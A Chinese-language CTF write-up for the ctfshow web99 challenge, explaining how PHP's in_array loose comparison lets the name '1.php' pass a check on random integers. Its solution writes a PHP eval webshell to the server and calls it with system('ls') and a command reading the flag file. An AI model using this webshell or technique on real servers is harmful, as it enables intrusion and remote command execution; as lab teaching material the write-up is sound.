[ctfshow web入门]web99 in_array的弱比较漏洞

信息收集

array_push(array, value):向数组最后的位置插入value

in_array(value, array, type):其中value是要查找的值,array是需要查找的的数组,type是查找的类型,如果没有指定类型,则以弱比较方式查找

in_array存在一个弱比较漏洞,也就是当type设置时,且value的类型与数组数据内容类型不同时,value会被转化为数组数据的类型。此时如果value是字符串,而array数据类型是int,那么字符串会被转化为int

php 复制代码
highlight_file(__FILE__);
// 生成一个数组
$allow = array();
// 遍历 36 到 0x36d;0x36d = 877
// 向数组插入元素,随机数1到最多877
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
}
// 查询是否存在$_GET['n'],如果存在则以$_GET['n']为文件名写入$_POST['content']
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

解题

由于in_array未设置type,我们构造?n=1.php,此时in_array比较时,1.php被强制类型转化为int,也就是1,1大概率存在于数组中,此时我们向1.php写入一句话木马即可

s 复制代码
?n=1.php
post:
content=<?php eval($_GET[cmd]);?>

再访问我们的木马文件,获取目录和flag

s 复制代码
1.php?cmd=system('ls');
1.php?cmd=system('tac flag36d.php');

web    目录    web

相关推荐
周小码10 小时前
10分钟搭建管理后台:laravel-admin实战入门
php·laravel
dog25010 小时前
从重尾到截断流量模型的演进
开发语言·php
菩提小狗13 小时前
每日安全情报报告 · 2026-07-03
网络安全·漏洞·cve·安全情报·每日安全
Johnstons13 小时前
游戏网络测试怎么做?从延迟到丢包,一套完整的游戏弱网测试方案
网络·游戏·php
Rocket-Luo14 小时前
谈谈企业中的网络安全
网络·安全·web安全
中云DDoS CC防护蔡蔡14 小时前
短信验证码被攻击怎么办
运维·经验分享·http·网络安全·微信
技术不好的崎鸣同学14 小时前
[BJDCTF2020]The mystery of ip 思路及解法
网络·安全·web安全
Bruce_Liuxiaowei16 小时前
2026年7月第1周网络安全形势周报
人工智能·安全·web安全·ai·智能体
楷哥爱开发17 小时前
降低网络爬虫成本:基础设施优化指南
服务器·开发语言·php
菩提小狗18 小时前
每日安全情报报告 · 2026-07-01
网络安全·漏洞·cve·安全情报·每日安全